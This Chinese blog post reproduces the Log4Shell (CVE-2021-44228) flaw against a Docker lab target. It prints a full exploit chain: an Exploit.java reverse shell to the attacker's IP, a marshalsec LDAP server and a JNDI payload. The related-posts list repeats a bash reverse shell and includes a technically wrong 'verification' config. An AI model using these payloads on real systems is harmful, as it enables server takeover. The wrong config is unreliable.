Apache log4j2 RCE(CVE-2021-44228)

已于 2022-07-16 15:51:38 修改
阅读量457 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: apache 服务器 web安全 安全
于 2022-07-16 15:50:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125820678
版权

 

Apache log4j2 远程代码执行漏洞

 

0x00 漏洞原理

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
 
 

0x01 影响版本

Apache Log4j 2.x <= 2.14.1 <= Log4j 2.15.0-rc1

 

0x02 环境搭建

marshalsec-0.0.3-SNAPSHOT-all.jar
链接:https://pan.baidu.com/s/1XnpVW9QluzAB5qmqrynSQg
提取码:tv8a

192.168.68.68  #靶机
192.168.68.168 #攻击机/接收shell反弹

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j2 registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j2 /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

靶机执行如下命令:

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln

请添加图片描述
 
 

docker run -it -d -p 8080:8080 --name log4j2 registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln

请添加图片描述
 
 

docker exec -it log4j2 /bin/bash

请添加图片描述
 
 

/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

请添加图片描述
 
 

http://192.168.86.86:8080/webstudy/hello-fengxuan  #环境搭建完毕,尝试访问主页

请添加图片描述
 
 

0x03 漏洞复现(log4j2反弹shell)
 1.攻击机(192.168.68.168)新建一个Exploit.java,并编译成class文件
注:本次测试使用java的版本为1.8,java版本会影响后续测试是否成功

//javac Exploit.java
public class Exploit {
   public Exploit(){
       try{
           // 要执行的命令
           String[] commands = {"bash","-c","exec 5<>/dev/tcp/192.168.68.168/12345;cat <&5 | while read line; do $line 2>&5 >&5; done"};
           Process pc = Runtime.getRuntime().exec(commands);
           pc.waitFor();
      } catch(Exception e){
           e.printStackTrace();
      }
  }

   public static void main(String[] argv) {
       Exploit e = new Exploit();
  }
}

请添加图片描述
 
 

2.攻击机(192.168.68.168)开启一个python服务,监听888端口:
python3 -m http.server 888

请添加图片描述
 
 

3.攻击机(192.168.68.168)借助marshalsec项目,启动一个LDAP服务器, 将web服务器端口888映射为1234 
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.68.168:888/#Exploit" 1234

请添加图片描述
 
 

4.攻击机开始监听12345端口(因为Exploit反弹shelll到攻击机的12345端口)

请添加图片描述
 
 

5.访问靶机,并将payload发送给靶机,注意需要将GET方法改为POST
c=${jndi:ldap://192.168.68.168:1234/Exploit}

请添加图片描述 
 

6.靶机成功访问了攻击机开启的web服务,并下载了Exploit.class恶意文件

请添加图片描述
 
 

7.使用marshalsec工具快捷的开启rmi服务,借助rmi服务将rmi reference result 成功重定向到web服务器

请添加图片描述
 
 

8.攻击机监听的6666端口成功收到反弹过来的shell

请添加图片描述
 
 
 
 

参考链接
https://cloud.tencent.com/developer/article/1921530
https://www.cnblogs.com/peace-and-romance/p/15717457.html

TheK403
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1289
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
点火三周的专栏
12-12 5702
重要的提示 : 要了解 Elastic 当前如何评估我们产品中此漏洞的内部风险,请参阅此处 概述 这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。 随着我们了解更多信息,我们将持续提供更多的更新。截至 2021 年 12 月 11 日星期六,此版本是准确的。可以通过Log4j2的安全页面直接调查来自 Apache 的更新。 CVE-2021-44228 (Log4Shell) 摘要 Lo...
Log4j(CVE-2021-44228)
ljj20020718的博客
07-12 94
使用POC: bash -i >& /dev/tcp/192.168.211.130/6666 0>&1,然后对该POC进行base64编码,使用漏洞利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(工具要在kali中使用,windows中使用无效)进入到vulhub里的指定漏洞库,打开环境:docker-compose up -d。选择工具生成的一个exp进行利用,访问后成功反弹shell。
Log4J2漏洞(CVE-2024-44228)原理_log4j2漏洞原理,网络安全面试项目
最新发布
e846815793的博客
04-10 708
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Apache Log4j 2 漏洞修复指南(CVE-2021-44228)
Wraith的博客
12-10 7955
Apache Log4j 2 漏洞修复指南 CVE-2021-44228 Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。 Log4j 的 JNDI 支持没有限制可以解析的名称。某些协议不安全或允许远程代码执行。Log4j 现在默认将协议限制为仅 java、ldap 和 ldaps,并将 ldap 协议限制为默认仅访问本地主机上提供的 Java 原始对象。 允许暴露此漏洞的一个向量是 Log4j 允许查找出现在日志消息中。从 Log4j
CVE-2021-44228:Apache Log4j RCE
Fly_鹏程万里
12-18 1388
文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
Log4j2 RCECVE-2021-44228)漏洞复现
博客地址 www.sec0nd.top
02-23 2210
Log4j2 RCECVE-2021-44228)漏洞复现 文章目录Log4j2 RCECVE-2021-44228)漏洞复现准备环境复现过程:用JNDIExploit启动一个ldap的服务使用BP抓包工具构造一个请求不足总结 准备环境 Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个 首先把师傅给的项目文件运行一下 发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。 忽略这行不完整的,可以正常运行 下面状态栏可以看到打开了8080端口,
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 778
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞。
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
Apache Log4j2 RCE(CVE-2021-44228)
weixin_60329395的博客
11-12 1145
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将**用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行(RCE)
vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)
qq_45780190的博客
12-15 4982
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 637
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
Apache Log4j代码执行漏洞(CVE-2021-44228)
weixin_45808483的博客
12-14 7891
前言: 12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。 Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。 Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值